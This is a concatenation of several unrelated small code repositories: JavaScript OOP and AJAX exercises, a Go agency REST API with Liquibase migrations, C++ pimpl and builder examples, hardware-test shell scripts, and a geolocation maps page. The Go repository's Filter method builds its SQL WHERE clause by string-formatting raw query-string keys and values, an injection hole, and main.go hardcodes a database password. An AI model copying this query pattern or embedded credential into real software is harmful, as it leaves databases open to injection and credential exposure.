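   Base/Derived and the sample values below are illustrative only. */
function Base(name){
    this.name = name;
}
Base.prototype.greet = function(){
    console.log(`Hello, ${this.name}`);
};
function Derived(name, level){
    Base.call(this, name); // constructor stealing: copies own properties onto `this`
    this.level = level;
}
Derived.prototype = Object.create(Base.prototype); // prototype chaining, done once
Derived.prototype.constructor = Derived;
let d = new Derived('Ana', 3);
d.greet(); // "Hello, Ana" resolved through the prototype chain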
<file_sep>class Animal{
constructor(name, age, type, size){
this.name = name;
this.age = age;
this.type = type;
this.size = size;
this.isEaten = false;
}
eat(animal){
if(animal instanceof Animal){
if(this.type.toLowerCase() === 'herbivore') console.log(`The animal ${this.name} is a herbivore and does not eat other animals`);
else{
if(this.size*2 <= animal.size) console.log(`The animal ${this.name} tried to eat ${animal.name} but it was too large.`);
else{
animal.isEaten = true;
console.log(`The animal ${this.name} ate the animal ${animal.name}`);
}
}
}else console.log(`The animal ${this.name} is eating ${animal}...`);
}
static getType(animal){
if(animal instanceof Animal) console.log(`The animal ${animal.name} is a ${animal.type} type of animal!`);
else console.log(`Unknown type of animal!`);
}
}
class Carnivore extends Animal{
constructor(name, age, size){
super(name, age, 'carnivore', size);
}
}
class Herbivore extends Animal{
constructor(name, age, size){
super(name, age, 'herbivore', size);
}
}
class Omnivore extends Animal{
constructor(name, age, size){
super(name, age, 'omnivore', size);
}
}
let lion = new Carnivore('Simba', 5, 500);
let zebra = new Herbivore('Marty', 10, 200);
let bear = new Omnivore('Beary', 1, 200);
let food = 'Carrots';
lion.eat(zebra);
zebra.eat(lion);
zebra.eat(food);
bear.eat(lion);
bear.eat(zebra);
bear.eat(food);
Animal.getType(lion);
Animal.getType(zebra);
Animal.getType(food);
<file_sep>//JQUERY
let btn = $("#btn");
let display = $("#display");
let clearBtn = $("#clearBtn");
btn.click(function(){
$.ajax ({
url: "https://jsonplaceholder.typicode.com/users",
success: function(data){
printDataResults(display, data);
},
error: function(){
alert('Error');
}
})
})
clearBtn.click(function(){
display.html("");
})
function printDataResults(display, data){
display.html(
`
<tr>
<th>ID</th>
<th>Name</th>
<th>Username</th>
<th>Email</th>
<th>Phone</th>
<th>Website</th>
<th>Address</th>
<th>Company</th>
</tr>`);
for(let user of data){
display.append(`
<tr>
<td>${user.id}</td>
<td>${user.name}</td>
<td>${user.username}</td>
<td>${user.email}</td>
<td>${user.phone}</td>
<td>${user.website}</td>
<td><b>Street:</b> ${user.address.street}<br>
<b>Suite:</b> ${user.address.suite}<br>
<b>City:</b> ${user.address.city}<br>
<b>Zipcode:</b> ${user.address.zipcode}<br>
<b>Geo:</b> lat-${user.address.geo.lat}, lng-${user.address.geo.lng}</td>
<td><b>Name:</b> ${user.company.name}<br>
<b>Catch Phrase:</b> ${user.company.catchPhrase}<br>
<b>BS:</b> ${user.company.bs}</td>
</tr>
`);
}
}
//FETCH
/*let btn = document.getElementById("btn");
let display = document.getElementById("display");
let clearBtn = document.getElementById("clearBtn");
btn.addEventListener('click', function(){
fetch("https://jsonplaceholder.typicode.com/users")
.then(function(data){
return data.json();
})
.then(function(data){
printDataResults(display,data)
})
})
clearBtn.addEventListener('click', function(){
display.innerHTML = "";
})
function printDataResults(display, data){
display.innerHTML =
`
<tr>
<th>ID</th>
<th>Name</th>
<th>Username</th>
<th>Email</th>
<th>Phone</th>
<th>Website</th>
<th>Address</th>
<th>Company</th>
</tr>
`;
for(let user of data){
display.innerHTML+=
`<tr>
<td style="border: 1px solid black;">${user.id}</td>
<td>${user.name}</td>
<td>${user.username}</td>
<td>${user.email}</td>
<td>${user.phone}</td>
<td>${user.website}</td>
<td><b>Street:</b> ${user.address.street}<br>
<b>Suite:</b> ${user.address.suite}<br>
<b>City:</b> ${user.address.city}<br>
<b>Zipcode:</b> ${user.address.zipcode}<br>
<b>Geo:</b> lat-${user.address.geo.lat}, lng-${user.address.geo.lng}</td>
<td><b>Name:</b> ${user.company.name}<br>
<b>Catch Phrase:</b> ${user.company.catchPhrase}<br>
<b>BS:</b> ${user.company.bs}</td>
</tr>
`
}
}*/<file_sep>function Academy(name, students, subjects, start, end){
this.name = name;
this.students = students;
this.subjects = subjects;
this.start = start;
this.end = end;
this.numberOfClasses = this.subjects.length *10;
this.printStudents = function(){
this.students.forEach(student => {
console.log(`${student.firstName} ${student.lastName}`);
});
}
this.printSubjects = function(){
this.subjects.forEach(subject => {
console.log(subject.title);
});
}
}
function Subject(title, isElective, academy, students){
this.title = title;
this.numberOfClasses = 10;
this.isElective = isElective;
this.academy = academy;
this.students = students;
this.overrideClasses = function(number){
if(number<3) return;
else this.numberOfClasses = number;
}
}
function Student(firstName, lastName, age){
this.firstName = firstName;
this.lastName = lastName;
this.age = age;
this.completedSubjects = [];
this.academy = null;
this.currentSubject = null;
this.startAcademy = function(academyObject){
this.academy = academyObject;
academyObject.students.push({firstName,lastName,age});
}
this.startSubject = function(subject){
if(this.academy === null) return;
else{
this.academy.subjects.forEach(sub => {
if(sub.title.toLowerCase() === subject.title.toLowerCase()){
if(this.currentSubject !== null) this.completedSubjects.push(this.currentSubject);
this.currentSubject = subject;
subject.students.push({firstName,lastName,age});
}
});
if(this.currentSubject === null) console.log('This is not a valid subject!');
}
}
}
|
7787b35c778fdd1c0b01ae3d12dde26ab139f1cc
|
[
"JavaScript"
] | 8
|
JavaScript
|
Dejan-Stojkoski/Homeworks-JSAdvanced
|
1470b8c7628961481e76cf2653d21294861d4fbb
|
6fad8f875d03b7a9352d5e6f120ef662521ece49
|
refs/heads/master
|
<file_sep>package repository
import (
"github.com/go-foward/abroad/domain/agency/dbmodels"
)
// AgencyCreator interface
type AgencyCreator interface {
Create(agency dbmodels.AgencyDatabaseModel) (*dbmodels.AgencyDatabaseModel, error)
}
// AgencyEditor interface
type AgencyEditor interface {
Save(agency dbmodels.AgencyDatabaseModel) (*dbmodels.AgencyDatabaseModel, error)
}
// AgencyRetriever interface
type AgencyRetriever interface {
Get(id int) (*dbmodels.AgencyDatabaseModel, error)
}
// AgencyFilterer interface
type AgencyFilterer interface {
Filter(filter map[string][]string) ([]dbmodels.AgencyDatabaseModel, error)
}
// AgencyRepository agency interfaces composition
type AgencyRepository interface {
AgencyCreator
AgencyEditor
AgencyRetriever
AgencyFilterer
}
<file_sep>package repository
import (
"fmt"
"log"
"strings"
"github.com/go-foward/abroad/domain/agency/dbmodels"
"github.com/jmoiron/sqlx"
)
// AgencyDatabaseRepository ...
type AgencyDatabaseRepository struct {
Database *sqlx.DB
}
// NewAgencyDatabaseRepository ...
func NewAgencyDatabaseRepository(db *sqlx.DB) *AgencyDatabaseRepository {
return &AgencyDatabaseRepository{
Database: db,
}
}
// Get ...
func (repo AgencyDatabaseRepository) Get(id int) (*dbmodels.AgencyDatabaseModel, error) {
var agency dbmodels.AgencyDatabaseModel
err := repo.Database.Get(&agency, "SELECT * FROM agency WHERE id = $1", id)
return &agency, err
}
// Filter ...
func (repo AgencyDatabaseRepository) Filter(filters map[string][]string) ([]dbmodels.AgencyDatabaseModel, error) {
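	// Note: the WHERE clause below is assembled with fmt.Sprintf, so filter keys
	// and values reach the SQL text unescaped; fine for a demo, but parameterized
	// queries would be needed before accepting untrusted input.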
var agencies []dbmodels.AgencyDatabaseModel
where := "WHERE 1=1"
for key, value := range filters {
where = fmt.Sprintf("%s AND %s = %s", where, key, fmt.Sprintf("'%s'", strings.Join(value, "','")))
}
log.Println(fmt.Sprintf("SELECT * FROM agency %s", where))
err := repo.Database.Select(&agencies, fmt.Sprintf("SELECT * FROM agency %s", where))
log.Println(agencies)
return agencies, err
}
// Save ...
func (repo AgencyDatabaseRepository) Save(agency dbmodels.AgencyDatabaseModel) (*dbmodels.AgencyDatabaseModel, error) {
return nil, nil
}
// Create ...
func (repo AgencyDatabaseRepository) Create(agency dbmodels.AgencyDatabaseModel) (*dbmodels.AgencyDatabaseModel, error) {
preparedStatement, err := repo.Database.PrepareNamed("INSERT INTO agency(name) VALUES(:name) RETURNING id")
if err != nil {
return nil, err
}
var id int
err = preparedStatement.Get(&id, agency)
if err != nil {
return nil, err
}
createdAgency, err := repo.Get(id)
if err != nil {
return nil, err
}
return createdAgency, err
}
<file_sep>package dbmodels
// AgencyDatabaseModel model
type AgencyDatabaseModel struct {
ID int `db:"id"`
Name string `db:"name"`
}
// AgencyDatabaseModelOption type
type AgencyDatabaseModelOption func(*AgencyDatabaseModel)
// NewAgencyDatabaseModel AgencyDatabaseModel builder
func NewAgencyDatabaseModel(name string, options ...AgencyDatabaseModelOption) *AgencyDatabaseModel {
model := &AgencyDatabaseModel{
Name: name,
}
for _, option := range options {
option(model)
}
return model
}
// AgencyID adds id into model
func AgencyID(id int) AgencyDatabaseModelOption {
return func(model *AgencyDatabaseModel) {
model.ID = id
}
	}
}
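// Usage sketch (illustrative, not part of the original file): the functional
// options above let callers set optional fields at construction time, e.g.
//
//	agency := NewAgencyDatabaseModel("Acme", AgencyID(42))
//
// which yields &AgencyDatabaseModel{ID: 42, Name: "Acme"} ("Acme"/42 are made up).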
<file_sep>package entities
// Agency model
type Agency struct {
ID int
Name string
}
<file_sep>package api
func (api API) routes() {
api.GET("/agency", filterAgency(api.AgencyRepository))
api.GET("/agency/:id", getAgency(api.AgencyRepository))
api.POST("/agency", postAgency(api.AgencyRepository))
}
<file_sep>--liquibase formatted sql
--changeset lucas.santos:1
CREATE TABLE IF NOT EXISTS agency (
id serial PRIMARY KEY,
name VARCHAR(255)
);
--rollback DROP TABLE IF EXISTS agency;<file_sep>package usecases
import (
"github.com/go-foward/abroad/domain/agency/repository"
)
// AgencyFilterRequest ...
type AgencyFilterRequest struct {
Filters map[string][]string
}
// AgencyFiltered ...
type AgencyFiltered struct {
ID int `json:"id"`
Name string `json:"name"`
}
// AgencyFilterResponse ...
type AgencyFilterResponse struct {
Agencies []AgencyFiltered `json:"agencies"`
}
// AgencyFilterUseCase ...
type AgencyFilterUseCase struct {
agencyRepository repository.AgencyRepository
}
// NewAgencyFilterUseCase ...
func NewAgencyFilterUseCase(repo repository.AgencyRepository) *AgencyFilterUseCase {
return &AgencyFilterUseCase{
agencyRepository: repo,
}
}
// Execute ...
func (usecase AgencyFilterUseCase) Execute(request AgencyFilterRequest) (*AgencyFilterResponse, error) {
dbAgencies, err := usecase.agencyRepository.Filter(request.Filters)
if err != nil {
return nil, err
}
agencies := []AgencyFiltered{}
for _, value := range dbAgencies {
agencies = append(agencies, AgencyFiltered{
ID: value.ID,
Name: value.Name,
})
}
response := &AgencyFilterResponse{
Agencies: agencies,
}
return response, nil
}
<file_sep>package api
import (
"fmt"
"io/ioutil"
"log"
"github.com/go-foward/abroad/domain/agency/repository"
"github.com/labstack/echo"
)
// API entrypoint
type API struct {
*echo.Echo
AgencyRepository repository.AgencyRepository
}
// NewAPI creates a new application
func NewAPI(repo repository.AgencyRepository) *API {
return &API{
Echo: echo.New(),
AgencyRepository: repo,
}
}
func (api API) printBanner() {
api.Echo.HideBanner = true
bytes, err := ioutil.ReadFile("banner.txt")
if err != nil {
log.Fatal(err)
}
fmt.Println(string(bytes))
}
// Run start http server
func (api API) Run() {
api.middlewares()
api.routes()
api.printBanner()
log.Fatal(api.Start(":8080"))
}
<file_sep>package compare
// StringsContains checks if a list of string contains a particular string
func StringsContains(values []string, query string) bool {
for _, value := range values {
if value == query {
return true
}
}
return false
}
<file_sep>package usecases
import (
"github.com/go-foward/abroad/domain/agency/repository"
)
// AgencyGetByIDRequest ...
type AgencyGetByIDRequest struct {
ID int
}
// AgencyRetrieved ...
type AgencyRetrieved struct {
Name string `json:"name"`
}
// AgencyGetResponse ...
type AgencyGetResponse struct {
Agency AgencyRetrieved `json:"agency"`
}
// AgencyGetByIDUseCase ...
type AgencyGetByIDUseCase struct {
agencyRepository repository.AgencyRepository
}
// NewAgencyGetByIDUseCase ...
func NewAgencyGetByIDUseCase(repo repository.AgencyRepository) *AgencyGetByIDUseCase {
return &AgencyGetByIDUseCase{
agencyRepository: repo,
}
}
// Execute ...
func (usecase AgencyGetByIDUseCase) Execute(request AgencyGetByIDRequest) (*AgencyGetResponse, error) {
var response *AgencyGetResponse
agency, err := usecase.agencyRepository.Get(request.ID)
if err != nil {
return nil, err
}
response = &AgencyGetResponse{
Agency: AgencyRetrieved{Name: agency.Name},
}
return response, nil
}
<file_sep>
DIR := ${CURDIR}
LIQUIBASE_CONFIGS := --defaultsFile=/infra/liquibase/liquibase.properties
RUN_LIQUIBASE := docker build -t liquibase ./liquibase && docker run --network host liquibase
_migrate:
${RUN_LIQUIBASE} update
tag:
${RUN_LIQUIBASE} tag "$(shell date '+%Y-%m-%d %H:%M:%S')"
migrate: _migrate tag
# example: make rollback tag="2000-01-01 18:56:57.668819"
rollback:
${RUN_LIQUIBASE} rollback $(tag)
dangerouslyRollback:
${RUN_LIQUIBASE} rollbackToDate "2000-01-01 18:56:57.668819"
RUN apt-get update \
&& apt-get -y install gnupg wget \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
RUN mkdir /opt/liquibase
WORKDIR /opt/liquibase
COPY . /opt/liquibase
ARG LIQUIBASE_VERSION=4.0.0
RUN set -x \
&& wget -O liquibase-${LIQUIBASE_VERSION}.tar.gz "https://github.com/liquibase/liquibase/releases/download/v${LIQUIBASE_VERSION}/liquibase-${LIQUIBASE_VERSION}.tar.gz" \
&& tar -xzf liquibase-${LIQUIBASE_VERSION}.tar.gz
RUN ln -s /opt/liquibase/liquibase /usr/local/bin/
RUN ls -la
ENTRYPOINT ["liquibase"]<file_sep>package usecases
import (
"github.com/go-foward/abroad/domain/agency/dbmodels"
"github.com/go-foward/abroad/domain/agency/repository"
)
// AgencyCreateRequest ...
type AgencyCreateRequest struct {
Name string
}
// AgencyCreated ...
type AgencyCreated struct {
ID int `json:"id"`
Name string `json:"name"`
}
// AgencyCreateResponse ...
type AgencyCreateResponse struct {
Agency AgencyCreated `json:"agency"`
}
// AgencyCreateUseCase ...
type AgencyCreateUseCase struct {
agencyRepository repository.AgencyRepository
}
// NewAgencyCreateUseCase ...
func NewAgencyCreateUseCase(repo repository.AgencyRepository) *AgencyCreateUseCase {
return &AgencyCreateUseCase{
agencyRepository: repo,
}
}
// Execute ...
func (usecase AgencyCreateUseCase) Execute(request AgencyCreateRequest) (*AgencyCreateResponse, error) {
dbAgency := dbmodels.NewAgencyDatabaseModel(request.Name)
agency, err := usecase.agencyRepository.Create(*dbAgency)
if err != nil {
return nil, err
}
response := &AgencyCreateResponse{
Agency: AgencyCreated{
ID: agency.ID,
Name: agency.Name,
},
}
return response, nil
}
<file_sep>module github.com/go-foward/abroad
go 1.14
require (
github.com/jackc/pgx/v4 v4.8.1
github.com/jmoiron/sqlx v1.2.0
github.com/labstack/echo v3.3.10+incompatible
github.com/labstack/echo/v4 v4.1.16 // indirect
gopkg.in/natefinch/lumberjack.v2 v2.0.0
)
<file_sep>package main
import (
"log"
"github.com/go-foward/abroad/application/agency/repository"
"github.com/go-foward/abroad/application/api"
_ "github.com/jackc/pgx/v4/stdlib"
"github.com/jmoiron/sqlx"
)
func main() {
db, err := sqlx.Connect("pgx", "postgres://postgres:adm123@localhost:5432/abroad?sslmode=disable")
if err != nil {
log.Fatalln(err)
}
agencyRepository := repository.NewAgencyDatabaseRepository(db)
v1 := api.NewAPI(agencyRepository)
v1.Run()
}
<file_sep>package api
import (
"time"
"github.com/labstack/echo"
"github.com/labstack/echo/middleware"
"gopkg.in/natefinch/lumberjack.v2"
)
func (api API) middlewares() {
api.Use(middleware.LoggerWithConfig(middleware.LoggerConfig{
Output: &lumberjack.Logger{
Filename: "./output.log",
MaxSize: 10,
MaxBackups: 3,
MaxAge: 28,
Compress: false,
},
}))
api.Use(middleware.Recover())
api.Use(api.traceRequest)
}
func (api API) traceRequest(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
c.Set("requestID", time.Now().String())
return next(c)
}
}
<file_sep>package api
import (
"log"
"net/http"
"strconv"
"github.com/go-foward/abroad/domain/agency/repository"
"github.com/go-foward/abroad/domain/agency/usecases"
"github.com/labstack/echo"
)
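// filterAgency hands the raw query string straight to the filter use case:
// c.Request().URL.Query() returns a map[string][]string, so a request such as
// GET /agency?name=Acme (illustrative) arrives as {"name": ["Acme"]}.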
func filterAgency(repo repository.AgencyRepository) echo.HandlerFunc {
return func(c echo.Context) error {
request := usecases.AgencyFilterRequest{
Filters: c.Request().URL.Query(),
}
log.Println(request)
response, err := usecases.NewAgencyFilterUseCase(repo).Execute(request)
if err != nil {
return err
}
return c.JSON(http.StatusOK, response.Agencies)
}
}
func getAgency(repo repository.AgencyRepository) echo.HandlerFunc {
return func(c echo.Context) error {
id, _ := strconv.Atoi(c.Param("id"))
request := usecases.AgencyGetByIDRequest{ID: id}
agency, err := usecases.NewAgencyGetByIDUseCase(repo).Execute(request)
if err != nil {
return err
}
return c.JSON(http.StatusOK, agency)
}
}
func postAgency(repo repository.AgencyRepository) echo.HandlerFunc {
return func(c echo.Context) error {
var createAgencyRequest usecases.AgencyCreateRequest
err := c.Bind(&createAgencyRequest)
if err != nil {
return err
}
usecase := usecases.NewAgencyCreateUseCase(repo)
createdAgency, err := usecase.Execute(createAgencyRequest)
if err != nil {
return err
}
return c.JSON(http.StatusCreated, createdAgency)
}
}
|
ca4ad54586feb7f70528d2068325605e8f7971b3
|
[
"SQL",
"Makefile",
"Go",
"Go Module",
"Dockerfile"
] | 17
|
Go
|
lucas-rds/golang-abroad
|
0a58d1e7a3bc477f768ba4568e2243c76620632a
|
29b22ef1e65088f1447ffb4ce5365ec04cf4509a
|
refs/heads/master
|
<file_sep># Design-Patterns
Code from the course by <NAME>
<file_sep>// Pimpl Idiom
// Hides the implementation of a class behind a pointer to a separately-defined
// implementation struct.
// The implementation details live in the .cpp file and are never exposed to
// clients of the header.
#include "Person.h"
struct Person::PersonImpl
{
void greet(Person* p);
};
void Person::PersonImpl::greet(Person* p)
{
printf("hello %s", p->name.c_str());
}
Person::Person()
: impl(new PersonImpl)
{
}
Person::~Person()
{
delete impl;
}
void Person::greet()
{
impl->greet(this);
}
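// A minimal usage sketch (illustrative, not part of the original sources): client
// code sees only the Person interface, while PersonImpl stays private to this
// .cpp, so changing the implementation does not force clients of Person.h to
// recompile.
//
//   #include "Person.h"
//   int main()
//   {
//       Person p;
//       p.name = "Ada";
//       p.greet(); // prints "hello Ada"
//   }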
<file_sep>#pragma once
#include <string>
struct Person
{
std::string name;
struct PersonImpl;
PersonImpl *impl; // bridge - not necessarily inner class, can vary
Person();
~Person();
// Implementation would be bridged in a separate class.
void greet();
};
<file_sep>#include <iostream>
#include "person.h"
#include "PersonBuilder.h"
#include "PersonAddressBuilder.h"
#include "PersonJobBuilder.h"
int main()
{
Person p = Person::create()
.lives().at("").with_postcode("").in("")
.works().at("").as_a("").earning(141);
return 0;
}
|
a5310d40c3afd619edb5ac33416c3bd7239afa3b
|
[
"Markdown",
"C++"
] | 4
|
Markdown
|
ArshaShiri/Design-Patterns
|
6cdfa2ab2b6a20f07cc229ad0d9c1824997b4814
|
34b3dcac41dcc36c188d40924a463264f0bcaf71
|
refs/heads/master
|
<file_sep>#!/bin/bash
awk -vORS="" -F"[][ ]" '{print $1}' a_out.txt >> testvector.txt
awk -vORS="" -F"[][ ]" '{print $1}' b_out.txt >> testvector.txt
awk -vORS="" -F"[][ ]" '{print $1}' c_out.txt >> testvector.txt
irun \
-clean \
-access rwc \
+define+TEST=20 \
-input run.tcl \
tb.sv \
decoder.v
<file_sep># PTM-Packet-Decoder
Seoul National University Intern Project
<file_sep>#!/bin/bash
scp -P 2222 ~/바탕화면/인턴/fyp/tb.sv sglee@SNU:~/test_code/
scp -P 2222 ~/바탕화면/인턴/fyp/decoder.v sglee@SNU:~/test_code/
scp -P 2222 ~/바탕화면/인턴/fyp/test.sh sglee@SNU:~/test_code/runsim
ssh -p 2222 sglee@SNU "cd test_code; bash -ic runsim"
#ssh -p 2222 sglee@SNU "cd test_code; rm tb.sv"
#ssh -p 2222 sglee@SNU "cd test_code; rm decoder.v"
<file_sep>#!/bin/bash
args="-clean -access rwc -input run.tcl tb.sv decoder.v"
sim_len=1500
printf "\nPTM Decoder Tester\n\n"
while [ 1 ]
do
printf "Test Mode:\n[1] Function Only Check \n[2] Artificial Test Vector \n[3] Test Vector from File\n[4] Exit\n\n"
read -p "Test Mode Select: " _testmode
if [ $_testmode -eq 1 ] ; then
printf "[Function List]\n\n"
printf "A_SYNC = 0\n"
printf "I_SYNC = 1\n"
printf "TIME_STAMP = 2\n"
printf "ATOM = 3\n"
printf "BRANCH = 4\n"
printf "WAYPOINT = 5\n"
printf "TRIGGER = 6\n"
printf "CONTEXT_ID = 7\n"
printf "VMID = 8\n"
printf "EXCEPTION_RT = 9\n"
printf "IGNORE = 10\n\n"
read -p "Select : " func
irun $args +define+TEST_FUNCTION=$func +define+SIMUL_MOD=0
elif [ $_testmode -eq 2 ] ; then
printf "Simulation Length?"
read sim_len
if [ $sim_len -gt 10 ] ; then
irun $args +define+SIMUL_MOD=1 +define+SIM_LENGTH=$sim_len
else
printf " Value should be greater than 10\n"
fi
elif [ $_testmode -eq 3 ] ; then
awk -F"[][ ]" '{print $1}' a_out.txt | sed '/^$/d' > test_vect.txt
awk -F"[][ ]" '{print $1}' b_out.txt | sed '/^$/d' >> test_vect.txt
awk -F"[][ ]" '{print $1}' c_out.txt | sed '/^$/d' >> test_vect.txt
grep "DUMP:" a_out.txt | awk '{print $3}'|sed 's/^..//' > answer.txt
grep "DUMP:" b_out.txt | awk '{print $3}'|sed 's/^..//' >> answer.txt
grep "DUMP:" c_out.txt | awk '{print $3}'|sed 's/^..//' >> answer.txt
printf "\n\nFile \"test_vect.txt\" Generated! \n"
printf "File \"answer.txt\" Generated! \n\n"
irun $args +define+SIMUL_MOD=2
else
exit 0;
fi
done
|
79bb6bf0555f29e95e5cb6546a0c77487a0ae549
|
[
"Markdown",
"Shell"
] | 4
|
Shell
|
jakesanggulee/PTM-Packet-Decoder
|
3facd07ee54054e9ad4ebc481dea9fa44eb3d840
|
03fa306ee3d5cb4289790a0247debcd67a9ea25e
|
refs/heads/master
|
<file_sep>/*!
* Demo v1.0.0 (https://www.ringer.it)
* Copyright 2017-2020 <NAME>
* Licensed under the GPL-2.0-or-later license
*/
console.log("WE LOVE TYPO3");
<file_sep><?php
namespace Ringer\Demo\ViewHelpers;
use TYPO3\CMS\Backend\Utility\BackendUtility;
use TYPO3Fluid\Fluid\Core\Rendering\RenderingContextInterface;
use TYPO3Fluid\Fluid\Core\ViewHelper\AbstractViewHelper;
use TYPO3Fluid\Fluid\Core\ViewHelper\Traits\CompileWithRenderStatic;
class RecordTitleViewHelper extends AbstractViewHelper
{
use CompileWithRenderStatic;
/**
*/
public function initializeArguments()
{
$this->registerArgument('table', 'string', 'Table', true);
$this->registerArgument('id', 'int', 'ID', true);
}
/**
* @param array $arguments
* @param \Closure $renderChildrenClosure
* @param RenderingContextInterface $renderingContext
*/
public static function renderStatic(
array $arguments,
\Closure $renderChildrenClosure,
RenderingContextInterface $renderingContext
)
{
$record = BackendUtility::getRecord($arguments['table'], $arguments['id']);
if ($record) {
return BackendUtility::getRecordTitle($arguments['table'], $record);
}
return '';
}
}
|
d71d26035f159d94252c438f7ea8736b2e94e2e4
|
[
"JavaScript",
"PHP"
] | 2
|
JavaScript
|
kwm-code/demo2
|
89e47254da20e62b31eb109e3e5ace297cddd932
|
6fb52d463fa2c7dd0600f9fe492c1b4abc9dd77d
|
refs/heads/main
|
<repo_name>MHAsenjo/solicitud-datos-personales<file_sep>/programa1.py
# This program asks for your name, surname, age, address, date of birth,
# email and phone. It must also add the age and the year of birth together.
nombre = input("buen dia, estoy completando tu ficha, por favor dime tu nombre: ")
apellido = input("cual es tu apellido: ")
edad = int(input("cual es tu edad: "))
direccion = input("tu direccion: ")
fechaNacimiento = input("fecha de nacimiento: ")
correoElectronico = input("cual es el correo electronico: ")
telefono = input("dame el telefono: ")
year = int(input("dime tu año de nacimiento: "))
# next, add the variables year and edad
resultado = year + edad
print(f"los datos del formulario son: {nombre, apellido, direccion, fechaNacimiento, edad, correoElectronico, telefono, resultado}")
# add year + age, subtract the month, multiply by the day and divide by the year
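# A minimal sketch of the exercise described above (illustrative: 'mes' and 'dia'
# would be extra inputs that the original program does not collect):
# mes = int(input("dime tu mes de nacimiento: "))
# dia = int(input("dime tu dia de nacimiento: "))
# operacion = ((year + edad) - mes) * dia / year
# print(f"resultado de la operacion: {operacion}")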
|
f852721ce147c849668c65f349a3a3ab906ca406
|
[
"Python"
] | 1
|
Python
|
MHAsenjo/solicitud-datos-personales
|
d8d82e1a86e5c87ec477afdcd0aa3b7244869e51
|
f0646f6b447a5688ec8112fdffd2f38b06bd14ae
|
refs/heads/master
|
<file_sep>/********************************************************************************
STARTING MAP
********************************************************************************/
function initialize() {
var mapOptions = {
center: { lat: -34.397, lng: 150.644},
zoom: 8
};
var map = new google.maps.Map(document.getElementById('map-canvas1'),mapOptions);
}
google.maps.event.addDomListener(window, 'load', initialize);
/********************************************************************************
INITIAL POSITION
********************************************************************************/
function initialPosition(e) { //Call geolocate()
geoLocate();
}
function geoLocate(){ //Find current latitude and longitude.
var msg = 'Sorry, we were unable to find your location. Please enter it below.';
var elLoc = document.getElementById("loc");
if (Modernizr.geolocation) { //Check Geo Support
navigator.geolocation.getCurrentPosition(success, fail);
elLoc.textContent = "Loading your location...";
} else {
elLoc.textContent = msg;
}
function success(position) {
lat1 = position.coords.latitude;
lon1 = position.coords.longitude; //If position found
msg = '<h3>Longitude:<br>';
msg += lon1 + '</h3>';
msg += '<h3>Latitude:<br>';
msg += lat1 + '</h3>';
elLoc.innerHTML = msg;
console.log(lat1);
console.log(lon1);
return [position.coords.longitude, position.coords.latitude];
}
function fail(msg) {
elLoc.textContent = msg;
console.log(msg.code);
}
}
var elInitial = document.getElementById("initial"); //Initial Position Button Listener
elInitial.addEventListener('click', initialPosition, false);
/********************************************************************************
INITIAL POSITION
********************************************************************************/<file_sep>function initialPosition(e) { //Call geolocate() from geolocate.js
e.preventDefault();
geoLocate();
}
function geoLocate(){
var msg = 'Sorry, we were unable to find your location. Please enter it below.';
var elLoc = document.getElementById("loc");
if (Modernizr.geolocation) { //Check Geo Support
navigator.geolocation.getCurrentPosition(success, fail);
elLoc.textContent = "Loading your location...";
} else {
elLoc.textContent = msg;
}
function success(position) {
lat = position.coords.latitude;
lon = position.coords.longitude; //If position found
msg = '<h3>Longitude:<br>';
msg += lon + '</h3>';
msg += '<h3>Latitude:<br>';
msg += lat + '</h3>';
elLoc.innerHTML = msg;
console.log(lat);
console.log(lon);
return [position.coords.longitude, position.coords.latitude];
}
function fail(msg) {
elLoc.textContent = msg;
console.log(msg.code);
}
}
function initialize () { //Initialize first map
var mapOptions = {
zoom : 8,
center : new google.maps.LatLng(lat,lon)
};
var map = new google.maps.Map(document.getElementById('map1'),mapOptions);
}
function loadScript() {
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'https://maps.googleapis.com/maps/api/js?v=3.exp' + '&signed_in=true&callback=initialize';
document.body.appendChild(script);
}
function initialize2 () { //Initialize second map
	lat2 = -lat; //Antipodal latitude is the negation (latitude only spans -90 to 90)
	lon2 = lon + 180; //180 degree longitude offset
	if (lon2 >= 180) {
		lon2 = -180 + (lon2 - 180);
	}
var mapOptions = {
zoom : 8,
center : new google.maps.LatLng(lat2,lon2)
};
console.log("Lat2: " +lat2+" Lon2: "+lon2);
var map = new google.maps.Map(document.getElementById('map2'),mapOptions);
}
var lat;
var lon;
var lat2;
var lon2;
var elInitial = document.getElementById("initial"); //Initial Position Button Listener
elInitial.addEventListener('click', initialPosition, false);
var elInitialMap = document.getElementById("getMap"); //Initial Position Button Listener
elInitialMap.addEventListener('click', loadScript, false);
var elInitialMap2 = document.getElementById("getMap2"); //Final Position Button Listener
elInitialMap2.addEventListener('click', initialize2, false);<file_sep># FarAway
App that shows the city furthest from you
<file_sep>function initialPosition(e) { //Call geolocate()
geoLocate();
}
function geoLocate(){ //Find current latitude and longitude.
var msg = 'Sorry, we were unable to find your location. Please enter it below.';
var elLoc = document.getElementById("loc");
if (Modernizr.geolocation) { //Check Geo Support
navigator.geolocation.getCurrentPosition(success, fail);
elLoc.textContent = "Loading your location...";
} else {
elLoc.textContent = msg;
}
function success(position) {
lat1 = position.coords.latitude;
lon1 = position.coords.longitude; //If position found
msg = '<h3>Longitude:<br>';
msg += lon1 + '</h3>';
msg += '<h3>Latitude:<br>';
msg += lat1 + '</h3>';
elLoc.innerHTML = msg;
console.log(lat1);
console.log(lon1);
return [position.coords.longitude, position.coords.latitude];
}
function fail(msg) {
elLoc.textContent = msg;
console.log(msg.code);
}
}
function getMap1 () {
var map = new google.maps.Map(document.getElementById("map-canvas1"), {
zoom: 8,
center: {lat: lat1, lng: lon1}
});
}
var lat1, lon1, lat2, lon2;
var urlfirst = "https://www.google.com/maps/embed/v1/place?key=";
var ap = "<KEY>";
var elInitial = document.getElementById("initial"); //Initial Position Button Listener
elInitial.addEventListener('click', initialPosition, false);
var elInitialMap = document.getElementById("getMap1"); //Initial Position Button Listener
elInitialMap.addEventListener('click', getMap1, false);
var elInitialMap2 = document.getElementById("getMap2"); //Final Position Button Listener
elInitialMap2.addEventListener('click', initialize2, false);
|
97b4b70ba854661aaf38d61144711672750f5dc8
|
[
"JavaScript",
"Markdown"
] | 4
|
JavaScript
|
Jordan-Holt/FarAway
|
0d6fea7fb355e9314ed5a3b87dfd82f8e7a8e831
|
2ccc785ac8db6d2b4f1a7186d1c105a89439b318
|
refs/heads/master
|
<repo_name>firefinchdev/Simple-Notes<file_sep>/app/src/main/java/com/softinit/notes/AddEditNoteActivity.java
package com.softinit.notes;
import androidx.appcompat.app.ActionBar;
